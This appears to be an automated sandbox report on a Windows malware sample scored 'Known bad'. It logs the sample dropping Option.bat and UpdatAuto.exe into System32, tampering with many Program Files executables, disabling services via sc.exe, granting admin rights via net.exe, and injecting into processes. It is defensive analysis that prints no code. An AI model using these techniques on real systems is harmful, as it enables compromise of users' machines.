Malware Analysis Report

2025-08-10 15:24

Sample ID 241103-f2vyyswdmb
Target e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb
SHA256 e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb
Tags
discovery evasion execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb

Threat Level: Known bad

The file e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution

Disables service(s)

Grants admin privileges

Executes dropped EXE

Loads dropped DLL

Network Share Discovery

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Unsigned PE

Permission Groups Discovery: Local Groups

System Location Discovery: System Language Discovery

Runs net.exe

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-03 05:22

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-03 05:22

Reported

2024-11-03 05:25

Platform

win7-20240903-en

Max time kernel

148s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe"

Signatures

Disables service(s)

evasion execution

Grants admin privileges

Network Share Discovery

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\Option.bat C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Windows\SysWOW64\UpdatAuto.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Windows\SysWOW64\Option.bat C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\Mahjong.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\tnameserv.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\Hearts.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\chkrzm.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\DVD Maker\DVDMaker.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\UpdatAuto.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A

Runs net.exe

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
N/A N/A C:\Windows\SysWOW64\UpdatAuto.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2796 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\UpdatAuto.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2604 N/A C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 2796 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 2796 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 2796 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
PID 3000 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe C:\Windows\system32\WerFault.exe
PID 3000 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe C:\Windows\system32\WerFault.exe
PID 3000 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe C:\Windows\system32\WerFault.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
